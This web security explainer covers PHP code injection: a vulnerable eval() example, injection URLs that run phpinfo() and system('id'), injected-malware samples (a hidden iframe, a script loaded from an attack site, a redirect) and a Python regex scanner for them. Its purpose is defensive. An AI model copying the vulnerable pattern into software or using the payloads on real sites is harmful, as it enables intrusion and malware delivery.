How to detect code injection attack


Code injection is also known as PHP code injection. A code injection attack is an exploitation technique in which a bug is exploited by injecting code into an application, which the application itself then executes.

PHP code injection attacks are generally performed by injecting PHP code into a vulnerable PHP-based application. The attacks are generally possible because of improper handling of input data or improper input validation.

A common misconception is that code injection and command injection are the same. They are two different things. An attacker exploiting a PHP code injection vulnerability can only do what PHP can do, whereas with command injection he can reach system commands.

Injection is used by an attacker to introduce (or "inject") code into a vulnerable computer program and change the course of execution.

These types of attacks are usually made possible due to a lack of proper input/output data validation, for example:

  • allowed characters
  • data format
  • amount of expected data

Code Injection differs from Command Injection in that an attacker is only limited by the functionality of the injected language itself. If an attacker is able to inject PHP code into an application and have it executed, he is only limited by what PHP is capable of. Command injection consists of leveraging existing code to execute commands, usually within the context of a shell.

Risk Factors

  • These types of vulnerabilities can range from very hard to find to easy to find
  • If found, they are usually moderately hard to exploit, depending on the scenario
  • If successfully exploited, impact could cover loss of confidentiality, loss of integrity, loss of availability, and/or loss of accountability

Example

When a developer uses the PHP eval() function and passes it untrusted data that an attacker can modify, code injection could be possible.

The example below shows a dangerous way to use the eval() function:

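$myvar = "varname";
$x = $_GET['arg'];   // attacker-controlled input
// $x is interpolated into the string, so its contents are parsed as PHP code
eval("\$myvar = $x;");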

As there is no input validation, the code above is vulnerable to a Code Injection attack.

For example:

/index.php?arg=1; phpinfo()

While exploiting bugs like these, an attacker may want to execute system commands. In this case, a code injection bug can also be used for command injection, for example:

/index.php?arg=1; system('id')

What does it mean to have pages marked with malware infection type “Code injection” in Google Search Console?

This means that pages on your site were modified to include malicious code, such as an iframe to a malware attack site.

Avoid using a browser to view infected pages on your site. Because malware often spreads by exploiting browser vulnerabilities, opening an infected malware page in a browser may damage your computer.

Log in to your filesystem. Investigate all resources that write to the "code injection" infected URLs. Some examples of malicious code injections are the following:

    • iframe to an attack site
<iframe frameborder="0" height="0" src="http://<attack-site>/path/file" 
  style="display:none" width="0"></iframe>
    • JavaScript or another scripting language that calls and runs scripts from an attack site
<script type='text/javascript' src='http://malware-attack-site/js/x55.js'></script>
    • Scripting that redirects the browser to an attack site
<script>
  if (document.referrer.match(/google\.com/)) {
    window.location("http://malware-attack-site/");
  }
</script>

Investigate all possible harmful code present on the site. It may be helpful to search for words like [iframe] to find iframe code. Other helpful keywords are “script”, “eval”, and “unescape”.
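The keyword search described above can be run over the web root from the filesystem, so the infected pages are never opened in a browser. The scanner below is an added example, not code from the original article; the rule names, the file-suffix list, the `trusted_hosts` allowlist and the `example` hosts in the constructed sample are assumptions.

```python
import re
from pathlib import Path

# Rules derived from the snippets and keywords listed in the article.
RULES = {
    "hidden-iframe": re.compile(
        r"<iframe\b[^>]*(?:display\s*:\s*none|(?:height|width)\s*=\s*[\"']?0\b)", re.I),
    "external-script": re.compile(
        r"<script\b[^>]*\bsrc\s*=\s*[\"']?(?:https?:)?//([^/\"'\s>]+)", re.I),
    "referrer-redirect": re.compile(
        r"document\.referrer[\s\S]{0,200}?(?:window\.)?location", re.I),
    "eval-call": re.compile(r"\beval\s*\(", re.I),
    "unescape-call": re.compile(r"\bunescape\s*\(", re.I),
}
SCAN_SUFFIXES = {".php", ".html", ".htm", ".js", ".inc", ".tpl"}  # assumed set

# Constructed sample page; hosts are placeholders, not real indicators.
SAMPLE = r'''<html><body>
<script src="https://cdn.example.org/lib.js"></script>
<iframe frameborder="0" height="0" src="http://attack-site.example/path/file"
  style="display:none" width="0"></iframe>
<script type='text/javascript' src='http://attack-site.example/js/a.js'></script>
<script>
  if (document.referrer.match(/google\.com/)) {
    window.location("http://attack-site.example/");
  }
</script>
<?php eval("\$myvar = $x;"); ?>
'''

def scan_text(text, trusted_hosts=()):
    """Return sorted (line_number, rule_name) findings for one file's text."""
    findings = set()
    for name, rx in RULES.items():
        for m in rx.finditer(text):
            if name == "external-script" and m.group(1).lower() in trusted_hosts:
                continue  # script host is on the caller's allowlist
            findings.add((text.count("\n", 0, m.start()) + 1, name))
    return sorted(findings)

def scan_tree(root, trusted_hosts=()):
    """Read web files as plain text (never rendered) and map path -> findings."""
    report = {}
    for path in sorted(Path(root).rglob("*")):
        if path.is_file() and path.suffix.lower() in SCAN_SUFFIXES:
            hits = scan_text(path.read_text(errors="replace"), trusted_hosts)
            if hits:
                report[str(path)] = hits
    return report
```

Every hit is a lead for manual review rather than proof of infection: legitimate code also uses eval() and third-party scripts, so compare flagged files against a known-good copy of the site.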
